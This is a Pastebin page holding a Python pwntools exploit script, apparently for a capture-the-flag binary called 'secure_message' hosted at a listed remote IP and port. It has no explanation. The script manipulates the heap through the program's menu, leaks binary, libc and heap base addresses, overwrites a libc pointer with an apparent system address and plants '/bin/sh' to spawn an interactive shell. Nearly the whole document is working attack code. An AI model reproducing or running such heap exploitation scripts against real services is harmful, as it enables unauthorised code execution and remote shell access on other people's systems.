Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
- # context(terminal=['tmux', 'new-window']) # open new window
- # libc = ELF('./libc-2.27.so')
- elf = ELF('./secure_message')
- context(os='linux', arch=elf.arch)
- RHOST = "178.128.87.12"
- RPORT = 31337
- LHOST = "127.0.0.1"
- LPORT = 31337
- def section_addr(name, elf=elf):
- return elf.get_section_by_name(name).header['sh_addr']
- def dbg(ss):
- log.info("%s: 0x%x" % (ss, eval(ss)))
- conn = None
- opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
- if opt in 'rl':
- conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
- elif opt == 'd':
- gdbscript = """
- continue
- """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
- conn = gdb.debug(['./secure_message'], gdbscript=gdbscript)
- else:
- conn = process(['./secure_message'])
- # conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'})
- if opt == 'a': gdb.attach(conn)
- def register(name, password, desc):
- conn.sendlineafter('Choice: ', '1')
- conn.sendafter('Username:', name)
- conn.sendafter('Password:', password)
- conn.sendafter('Describe your self', desc)
- def login(name, password):
- conn.sendlineafter('Choice: ', '2')
- conn.sendafter('Username:', name)
- conn.sendafter('Password:', password)
- conn.recvuntil('Hello:')
- def quit():
- conn.sendlineafter('Choice: ', '3')
- def add(name, size, content):
- conn.sendlineafter('Choice: ', '1')
- conn.sendlineafter('Name: ', name)
- conn.sendlineafter('Size:', str(size))
- time.sleep(0.1)
- conn.send(content)
- def edit(idx, size, content):
- conn.sendlineafter('Choice: ', '3')
- conn.sendlineafter('edit?', str(idx))
- conn.sendlineafter('Size:', str(size))
- time.sleep(0.1)
- conn.send(content)
- def remove(idx):
- conn.sendlineafter('Choice: ', '2')
- conn.sendlineafter('?', str(idx))
- # exploit
- log.info('Pwning')
- register('hoge\n', 'fuga\n','a'*0x80)
- register('b'*0x20,'b'*0x20,'b'*0x80)
- register('c'*0x20,'c'*0x20,'c'*0x80)
- register('d'*0x20,'d'*0x20,'d'*0x80)
- login('hoge\n', 'fuga\n')
- add('x'*0x18, 0xfd0, 'z'*0xfd0)
- conn.send(p64(0xc9f68e5b26a07627))
- conn.send(p64(0xc9f68e5b26a07627))
- conn.send(p64(0xc9f68e5b26a07627))
- add('y'*0x18, 0xfd0, 'w'*0xfd0)
- conn.send(p64(0xc9f68e5b26a07627+0x1000))
- conn.send(p64(0xc9f68e5b26a07627+0x1000))
- conn.send(p64(0xc9f68e5b26a07627+0x1000))
- edit(0, -1, 'a'*0x1f00+'\n')
- add('', 0xff, '\n')
- conn.send(p64(0xc9f68e5b26a07627+0x3000))
- conn.send(p64(0xc9f68e5b26a07627+0x3000))
- conn.send(p64(0)*4)
- #conn.send(p64(0xc9f68e5b26a07627+0x2000))
- conn.sendlineafter('Choice: ', '4')
- conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy')
- bin_base = u64(conn.recv(6)+'\x00\x00') - 0x211d
- dbg('bin_base')
- conn.recvuntil('\n')
- libc_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x3ec2b0
- dbg('libc_base')
- conn.recv(14)
- heap_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x250
- dbg('heap_base')
- add('aaaaaa', 0x1000, 'b'*0x1000)
- conn.send(p64(0xdeadbeef000))
- conn.send(p64(0xdeadbeef000))
- conn.send(p64(0)*4)
- add('target', 0x100, 'c'*0x1000)
- conn.send(p64(0xdeadbef0000))
- conn.send(p64(0xdeadbef0000))
- conn.send(p64(0)*4)
- edit(2, 8192, 'hoge\n')
- payload = 'd'*0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10)
- add('aaaaaa', 0x1100, payload+'\n')
- conn.send(p64(0x00000deadbef0000-0x1000))
- conn.send(p64(0x00000deadbef0000-0x1000))
- conn.send(p64(0)*4)
- payload = p64(0) + p64(0x31)
- payload += p64(0) * 5
- payload += p64(0x31)
- edit(0, 0x100, payload+'\n')
- remove(2)
- payload = p64(0) + p64(0x31)
- payload += p64(libc_base + 0x3ed8e8)+p64(0) * 4
- payload += p64(0x31)
- edit(0, 0x100, payload+'\n')
- add('a', 0xf00, 'hoge\n')
- conn.send(p64(0xbeefdead000))
- conn.send(p64(0xbeefdead000))
- conn.send(p64(0)*4)
- add('a', 0xf00, '/bin/sh\x00\n')
- conn.send(p64(0xbeefdead000))
- conn.send(p64(0xbeefdead000))
- conn.send(p64(libc_base+0x4f440))
- conn.interactive()
Add Comment
Please, Sign In to add comment